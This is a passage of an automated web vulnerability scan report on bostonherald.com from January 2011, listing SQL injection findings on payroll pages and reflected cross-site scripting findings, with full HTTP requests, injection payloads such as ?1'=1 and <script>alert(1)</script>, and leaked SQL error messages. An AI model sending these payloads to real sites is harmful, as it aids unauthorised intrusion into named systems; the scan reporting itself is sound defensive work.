8.200. http://www.bostonherald.com/track/star_tracks/view/20110128kristen_stewart_in_talks_to_play_snow_white/srvc=track&position=recent_bullet

8.201. http://www.bostonherald.com/track/star_tracks/view/20110128seiji_ozawa_has_back_surgery/srvc=track&position=also

8.202. http://www.bostonherald.com/track/star_tracks/view/20110128startracks/srvc=home&position=also

8.203. http://www.bostonherald.com/track/track_gals_tv/

8.204. http://www.bostonherald.com/users/register

8.205. http://www.bostonherald.com/users/register/

8.206. http://www.bostonherald.com/weather/

9. File upload functionality

9.1. http://www.bostonherald.com/about/contact/news_tip.bg

9.2. http://www.bostonherald.com/sports/football/patriot_moments/

10. Email addresses disclosed

10.1. http://www.bostonherald.com/about/contact/

10.2. http://www.bostonherald.com/about/home_delivery/

10.3. http://www.bostonherald.com/blogs/news/city_desk_wired/index.php/2011/01/27/keeping-a-roof-over-your-head/

10.4. http://www.bostonherald.com/blogs/news/katy_on_the_campaign_trail/

10.5. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/

10.6. http://www.bostonherald.com/blogs/news/on_the_t/

10.7. http://www.bostonherald.com/business/general/view.bg

10.8. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

10.9. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/srvc=home&position=also

10.10. http://www.bostonherald.com/business/general/view/20110128report_massachusetts_economic_growth_slowed_in_fourth_quarter/srvc=home&position=also

10.11. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

10.12. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=home&position=6

10.13. http://www.bostonherald.com/business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/srvc=home&position=also

10.14. http://www.bostonherald.com/business/technology/general/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also

10.15. http://www.bostonherald.com/entertainment/movies/reviews/view.bg

10.16. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

10.17. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2

10.18. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/srvc=home&position=also

10.19. http://www.bostonherald.com/entertainment/music/general/view/20110128banditas_singer_rocks_the_boat/srvc=home&position=also

10.20. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

10.21. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also

10.22. http://www.bostonherald.com/mediacenter/

10.23. http://www.bostonherald.com/mediacenter/index.php

10.24. http://www.bostonherald.com/news/opinion/

10.25. http://www.bostonherald.com/news/politics/view.bg

10.26. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

10.27. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=1

10.28. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

10.29. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/srvc=home&position=0

10.30. http://www.bostonherald.com/news/regional/gardner_heist/

10.31. http://www.bostonherald.com/news/regional/view.bg

10.32. http://www.bostonherald.com/news/regional/view.bg

10.33. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

10.34. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also

10.35. http://www.bostonherald.com/news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/srvc=home&position=also

10.36. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

10.37. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4

10.38. http://www.bostonherald.com/projects/boston_pensions/

10.39. http://www.bostonherald.com/projects/bra/

10.40. http://www.bostonherald.com/projects/buybacks/

10.41. http://www.bostonherald.com/projects/consultants/

10.42. http://www.bostonherald.com/projects/edic/

10.43. http://www.bostonherald.com/projects/lawyer_pay/

10.44. http://www.bostonherald.com/projects/mta2008/

10.45. http://www.bostonherald.com/projects/payroll/brockton/

10.46. http://www.bostonherald.com/projects/payroll/cambridge/

10.47. http://www.bostonherald.com/projects/payroll/cca/

10.48. http://www.bostonherald.com/projects/payroll/mass_pike/

10.49. http://www.bostonherald.com/projects/payroll/quasi_state/

10.50. http://www.bostonherald.com/projects/payroll/quincy/

10.51. http://www.bostonherald.com/projects/payroll/springfield/

10.52. http://www.bostonherald.com/projects/payroll/suffolk/

10.53. http://www.bostonherald.com/projects/payroll/worcester/

10.54. http://www.bostonherald.com/projects/your_tax_dollars.bg

10.55. http://www.bostonherald.com/projects/your_tax_dollars.bg

10.56. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

10.57. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/srvc=home&position=also

10.58. http://www.bostonherald.com/sports/columnists/view/20110128its_time_for_real_bargaining_nfl/srvc=home&position=also

10.59. http://www.bostonherald.com/sports/football/patriots/view.bg

10.60. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

10.61. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/srvc=home&position=7

10.62. http://www.bostonherald.com/store/

10.63. http://www.bostonherald.com/track/inside_track/view/20110127tracked_down_shaquille_oneal_f_murray_abraham__more/srvc=track&position=also

10.64. http://www.bostonherald.com/track/inside_track/view/20110128tracked_down_deion_branch_jarvis_green_kevin_faulk_and_more_1/srvc=home&position=also

10.65. http://www.bostonherald.com/track/inside_track/view/20110128we_hear_mitt_romney_david_letterman_andrew_weisblum_and_more/srvc=home&position=also

11. Content type incorrectly stated

11.1. http://www.bostonherald.com/home/includes/twitter.inc

11.2. http://www.bostonherald.com/projects/boston_pensions/

11.3. http://www.bostonherald.com/track/includes/twitter.inc



1. SQL injection  next
There are 6 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.bostonherald.com/projects/payroll/cambridge/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/cambridge/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/cambridge/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 451
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.*,j.full FROM `cambridgeData` a INNER JOIN `cambridgeCats` j ON j.cat_id = department_id WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.2. http://www.bostonherald.com/projects/payroll/mass_pike/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/mass_pike/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/mass_pike/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:29:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 319
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT * FROM `massPikePayroll` WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.3. http://www.bostonherald.com/projects/payroll/quasi_state/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/quasi_state/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/quasi_state/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:39:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 492
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.*, b.agency FROM `quasi_state_data` a INNER JOIN `quasi_state_agencies` b ON a.quasi_state_agency_id = b.id WHERE 1=1 ORDER BY ?1\'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1\'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.4. http://www.bostonherald.com/projects/payroll/quincy/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/quincy/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/quincy/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:36:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 317
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `quincyData` a WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.5. http://www.bostonherald.com/projects/payroll/suffolk/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/suffolk/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/suffolk/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 319
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `suffolkData` a WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.6. http://www.bostonherald.com/projects/payroll/worcester/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/worcester/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/worcester/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:42:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 323
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `worcesterData` a WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 42 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4afcc"><script>alert(1)</script>d82b4897c0c was submitted in the REST URL parameter 5. This input was echoed as 4afcc\"><script>alert(1)</script>d82b4897c0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/entertainment/guestlisted/index.php/20114afcc"><script>alert(1)</script>d82b4897c0c/01/27/van-halen-recording-with-celine-dion-producer/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:09:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/entertainment/guestlisted/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:09:22 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/entertainment/guestlisted/index.php/20114afcc\"><script>alert(1)</script>d82b4897c0c/01/27/van-halen-recording-with-celine-dion-producer/">
...[SNIP]...

2.2. http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/ [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70037"><script>alert(1)</script>7feba13b723 was submitted in the REST URL parameter 6. This input was echoed as 70037\"><script>alert(1)</script>7feba13b723 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/entertainment/guestlisted/index.php/2011/0170037"><script>alert(1)</script>7feba13b723/27/van-halen-recording-with-celine-dion-producer/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:10:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/entertainment/guestlisted/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:10:17 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
